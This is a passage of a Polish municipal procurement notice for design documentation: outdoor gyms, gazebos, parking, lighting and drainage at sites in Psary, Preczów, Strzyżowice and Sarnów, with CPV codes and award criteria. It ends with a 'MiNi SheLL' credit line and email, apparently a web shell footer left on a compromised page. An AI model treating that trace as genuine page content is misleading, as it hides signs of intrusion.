1. Zagospodarowanie terenu placu przy Ośrodku Pomocy Społecznej w Psarach na działkach nr 349 i 351
Opis lokalizacji stanu istniejącego:
Teren istniejący objęty jest Planem Zagospodarowania Przestrzennego oznaczony symbolem  3US teren przeznaczony pod usługi sportu i rekreacji (działka nr 349) oraz 24MN teren przeznaczony pod zabudowę mieszkaniową jednorodzinną z nieuciążliwymi usługami jako funkcja uzupełniająca (działka o nr 351).
Podstawowe założenia projektowe:
Przedmiotowa dokumentacja projektowa ma obejmować w szczególności zaprojektowanie siłowni zewnętrznej, kręgu ogniskowego zadaszonego, altany, zjazdu z drogi i miejsc postojowych na działce nr 349 i 351, w bezpośrednim sąsiedztwie placu zabaw wraz z elementami towarzyszącymi:
a) urządzenia siłowni zewnętrznej: urządzenie podwójne typu biegacz i orbitrek na wspólnym pylonie, urządzenie podwójne typu wyciąg i krzesło na wspólnym pylonie, urządzenie podwójne typu rower i jeździec na wspólnym pylonie, urządzenie podwójne typu surfer i twister na wspólnym pylonie, urządzenie podwójne typu narciarz i wioślarz na wspólnym pylonie,
b) nawierzchnia z kostki betonowej pod urządzeniami do ćwiczeń połączona z istniejącym chodnikiem,
c) uporządkowanie zieleni poprzez nasadzenie drzew i krzewów,
d) ławki, kosze,
e) zjazd z drogi i miejsca postojowe dla samochodów,
f) alejki chodniki dla zagospodarowania terenu,
g) krąg ogniskowy z zadaszeniem,
h) altana,
i) wykonanie ogrodzenia terenu połączonego komunikacyjnie z istniejącym zagospodarowaniem,
j) oświetlenie parkowe, z uwzględnieniem możliwości zastosowania oświetlenia wykorzystującego odnawialne źródła energii.
2. Zagospodarowanie terenu placu przy Ochotniczej Straży Pożarnej w Preczowie na działce nr 929/4
Opis lokalizacji stanu istniejącego:
Teren istniejący objęty jest Planem Zagospodarowania Przestrzennego oznaczony symbolem  2U teren przeznaczony pod uciążliwą zabudowę  usługową, działka nr 929/4. Obecnie zrealizowano na tym terenie projekt Zagospodarowania przestrzeni publicznej na terenie Gminy Psary-Plac i budynek Ochotniczej Straży Pożarnej w Preczowie na działkach nr 929 4, 923, 930, opracowany przez B.P.A i U.I, COMTAREX Katowice ul. Stawowa 3/7.
Podstawowe założenia projektowe:
Przedmiotowa dokumentacja projektowa ma obejmować w szczególności zaprojektowanie siłowni zewnętrznej wraz z elementami towarzyszącymi tj.
a) urządzenia siłowni zewnętrznej: wyciąg górny-odwodzciel, wahadło, rowerek, prasa ręczna-wyciąg dolny, wioślarz,
b) nawierzchnia z kostki betonowej pod urządzeniami do ćwiczeń zarówno pod istniejącymi jak i projektowanymi,
c) uporządkowanie zieleni i ewentualne jej urządzenie,
d) ławki, kosze.
3. Zagospodarowanie terenu placu przy Ochotniczej Straży Pożarnej w Strzyżowicach na działce nr 702/1
Opis lokalizacji stanu istniejącego:
Teren istniejący objęty jest Planem Zagospodarowania Przestrzennego oznaczony symbolem 8U, teren zabudowy usługowej, działka nr 702/1. Obecnie wykonany jest Projekt budowlano-wykonawczy Przebudowy i i remontu części budynku przy OSP Strzyżowice na centrum usług społecznych wraz z zagospodarowaniem i dostosowaniem istniejącego otoczenia do nowej funkcji opracowany przez VIZ PROJEKT Pracownia Architektoniczna Joanna Korczyńska 43-100 Tychy ul. Wieniawskiego 36/8 który należy uwzględnić podczas realizacji projektu siłowni.
Podstawowe założenia projektowe:
Przedmiotowa dokumentacja projektowa ma obejmować w szczególności zaprojektowanie siłowni zewnętrznej w zachodniej części działki w bezpośrednim sąsiedztwie placu zabaw wraz z elementami towarzyszącymi tj.:
a) urządzenia siłowni zewnętrznej: urządzenie podwójne typu biegacz i orbitrek na wspólnym pylonie, urządzenie podwójne typu wyciąg i krzesło na wspólnym pylonie, urządzenie podwójne typu rower i jeździec na wspólnym pylonie, urządzenie podwójne typu surfer i twister na wspólnym pylonie, urządzenie podwójne typu narciarz i wioślarz na wspólnym pylonie,
b) nawierzchnia z kostki betonowej pod urządzeniami do ćwiczeń połączona z istniejącym chodnikiem,
c) uporządkowanie zieleni poprzez nasadzenie drzew i krzewów.
d) ławki, kosze na śmieci,
e) wykonanie ogrodzenia terenu, 
f) oświetlenie parkowe, z uwzględnieniem możliwości zastosowania oświetlenia wykorzystującego odnawialne źródła energii. Szczegółowy opis przedmiotu zamówienia zawiera załącznik SIWZ. Warunki płatności zgodnie z warunkami zawartymi w projekcie umowy Zał nr 7 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.32.00.00-7, 71.24.70.00-1, 71.24.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin realizacji - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie kompletnych dokumentacji projektowych w podziale na dwie odrębne części.
Część Nr 2:
Zagospodarowanie terenu przy Zespole Szkolno-Przedszkolnym nr 2 w Sarnowie na działkach nr 311 i 292/1 i przy Klubie Sportowym w Sarnowie na działce 1016/1, z aktualizacją projektu budynku szatni i trybun.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie kompletnych dokumentacji projektowo-kosztorysowych obejmujących projekty budowlano-wykonawcze, kosztorysy inwestorskie i przedmiary robót, specyfikacje techniczne wykonania i odbioru robót budowlanych oraz inne opracowania niezbędne do spełnienia wszystkich zakładanych funkcji oraz niezbędne do uzyskania pozwolenia na budowę lub zgłoszenia zamiaru rozpoczęcia robót budowlanych wraz z uzyskaniem ostatecznych decyzji o pozwoleniu na budowę lub braku sprzeciwu do zgłoszenia robót budowlanych i sprawowaniem nadzoru autorskiego w trakcie realizacji inwestycji, w następującym zakresie:
1. Zagospodarowanie terenu przy Zespole Szkolno-Przedszkolnym nr 2 w Sarnowie na działkach nr 311 i 292/1
Opis lokalizacji stanu istniejącego:
Teren przeznaczony pod inwestycję obejmuje część działki o nr ewid. 292/1, jednostka ewidencyjna Psary teren przedszkola i działkę nr ewid. 311 teren szkoły.
Podstawowe założenia projektowe:
Przedmiotowa dokumentacja projektowa ma w szczególności obejmować zaprojektowanie na działce nr 292/1 teren przedszkola:
a) oświetlenia wzdłuż wschodniej granicy działki o długości około 120mb przy nowowybudowanym chodniku, z uwzględnieniem możliwości zastosowania oświetlenia wykorzystującego odnawialne źródła energii,
b) placu zabaw przy przedszkolu w miejscu istniejącego - zaprojektowanie nowych urządzeń i ich usytuowanie w terenie wraz z zastosowaniem nawierzchni bezpiecznej,
c) altany drewnianej w formie sceny letniej na występy dzieci. Scena drewniana na podwyższeniu z zadaszeniem o konstrukcji drewnianej krytej np. gontem papowym. W tylnej części zamykane pomieszczenie w którym będą składowane ławki, stoliki. Obecnie w tym miejscu istnieje altana ze sceną jednak ze względu na stan techniczny kwalifikuje się do rozbiórki, do altanki doprowadzony jest prąd,
d) uporządkowanie zieleni poprzez nasadzenie drzew i krzewów,
e) ciągi komunikacyjne.
Na działce nr 311 teren szkoły przewiduje się zaprojektowanie w szczególności:
a) siłowni zewnętrznej na terenie za szkołą obok istniejącego placu zabaw w skład której wchodzić będą urządzenia: urządzenie podwójne typu biegacz i orbitrek na wspólnym pylonie, urządzenie podwójne typu wyciąg i krzesło na wspólnym pylonie, urządzenie podwójne typu rower i jeździec na wspólnym pylonie, urządzenie podwójne typu surfer i twister na wspólnym pylonie, urządzenie podwójne typu narciarz i wioślarz na wspólnym pylonie, 
b) nawierzchnia pod urządzeniami do ćwiczeń z kostki betonowej,
c) miejsca postojowe dla samochodów na terenie po lewej stronie szkoły. Należy zaprojektować maksymalną ilość miejsc postojowych jaka może powstać na terenie o powierzchni około 11,0 m szerokości i 20,0 m długości, nawierzchnia np. z kostki brukowej, zapewnić należy odwodnienie utwardzonego terenu.
2. Zagospodarowanie terenu przy Klubie Sportowym w Sarnowie na działce 1016/1, z aktualizacją projektu budynku szatni i trybun
Opis lokalizacji stanu istniejącego:
Teren przeznaczony pod inwestycję obejmuje działkę nr 1016/1, o powierzchni 11.144 m2.
Podstawowe założenia projektowe:
a) przeprojektowanie parkingu przed budynkiem szatni i boiska wraz z wyznaczeniem maksymalnej ilości miejsc postojowych, w tym miejsc dla niepełnosprawnych oraz - w razie konieczności wykonaniem projektu przebudowy zjazdów na parking i teren boiska z ul. Głównej i ul. Parkowej wraz z  projektem  przebudowy istniejącego ogrodzenia (w przypadku konieczności). W miejscu istniejącego parkingu należy zaprojektować parking dla samochodów osobowych wraz z uwzględnieniem miejsc dla niepełnosprawnych, wykorzystując optymalnie istniejący teren, ewentualnie teren przyległy, niezagospodarowany, pod miejsca parkingowe oraz bezkolizyjne parkowanie. W przypadku konieczności należy przeprojektować istniejące zjazdy na parking - od ul. Głównej i Parkowej. Dodatkowo należy rozważyć możliwość wykonania dodatkowego parkingu na terenie opracowania - od strony ul. Parkowej , uwzględniając korektę ogrodzenia i bramy wjazdowej.
b) zaprojektowanie układu komunikacji pieszej na działce nr 1016/1, wokół istniejącego boiska i budynku szatni oraz dojść i dojazdów do istniejących bram i furtek oraz projektowanego parkingu. Należy zaprojektować sieć dojść i chodników dla pieszych wokół przeprojektowywanych parkingów, wokół boisk i budynku, dogodne dojścia do budynku wraz z fragmentami chodników wzdłuż drogi dojazdowej, dojście i dojazd do śmietnika głównego na działce.
c) wykonanie projektu oświetlenia i monitoringu wraz z alarmem dla całego terenu klubu sportowego - boiska, budynku, trybun, projektowanych parkingów i dojść pieszych; Oświetlenie zewnętrzne należy zaprojektować w formie stojących latarni parkowych o prostej stylistyce, wraz z uwzględnieniem oświetlenia pod monitoring oraz oświetlenia wejść, bram i ogrodzenia na czujniki ruchu. Monitoring - zakres i ilość kamer, urządzenia sterujące i rodzaj podglądu oraz rodzaj zainstalowanych alarmów należy uzgodnić z przedstawicielem Zamawiającego.
d) zaprojektowanie małej architektury wokół terenu klubu - śmietnik, ławeczki, kosze na śmieci itp. Należy zaprojektować wyposażenie terenu w dodatkowe ławeczki, kosze na śmieci, ozdobne lampy parkowe oświetlenia zewnętrznego, stanowiska do parkowania rowerów oraz inne elementy małej architektury dobrane wg koncepcji projektantów, uzgodnione z Zamawiającym. Należy wydzielić miejsce utwardzone na śmietnik i zaprojektować wiatę na kontenery, stylistyką i kolorystyką dopasowane do całej koncepcji wyposażenia terenu. W przypadku konieczności korekty przebiegu ogrodzenia. Wymiany furtek li bram wjazdowych, należy zaprojektować te elementy w identycznej stylistyce jak istniejące lub wymienić całe ogrodzenie.
e) zaprojektowanie odwodnienia całego terenu klubu sportowego, wraz z odwodnieniem boiska i odprowadzeniem wód deszczowych. Należy zaprojektować całkowite odwodnienie terenu wraz z odprowadzeniem wód opadowych do kanalizacji lub zbiornika wodnego - wody opadowe z boiska, terenów utwardzonych i parkingów, dachu budynku, pozostałych terenów działki.
f) zaprojektowanie renowacji murawy boiska w tym zaprojektowanie automatycznego systemu nawadniania. Należy zaprojektować wymianę całej murawy boiska.
g) przeprojektowanie podestów betonowych od strony ul. Parkowej z przeznaczeniem na trybunę dla kibiców drużyny gości.
h) zaprojektowanie korekty zaprojektowanych trybun wraz z uwzględnieniem zadaszenia, 
i) aktualizację projektu połączoną z przebudową trybun dla widzów - aktualizację dokumentacji kosztorysowej . Należy wykonać aktualizację części kosztorysowej dokumentacji dot,. budynku zaplecza sportowego i trybun. Należy uwzględnić trybuny zadaszone.
j) zaprojektowanie oświetlenia sportowego, z uwzględnieniem możliwości zastosowania oświetlenia wykorzystującego odnawialne źródła energii.
k) należy zagospodarować lub przebudować istniejące pozostałe budynki w terenie własności, należy zagospodarować i przeprojektować podest betonowy od strony ul. Parkowej oraz pozostałe elementy istniejące na terenie klubu.
Inwestor dysponuje dokumentacją (którą  załącza do nin postępowania) budynku zaplecza sportowego oraz przebudowy trybun wymagającą uaktualnienia w zakresie dokumentacji kosztorysowej i zadaszenia trybun. Szczegółowy opis przedmiotu zamówienia zawiera SIWZ. Warunki płatności zgodnie z warunkami zawartymi w projekcie umowy Zał nr 7a do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.32.00.00-7, 71.24.70.00-1, 71.24.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin realizacji - 3</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com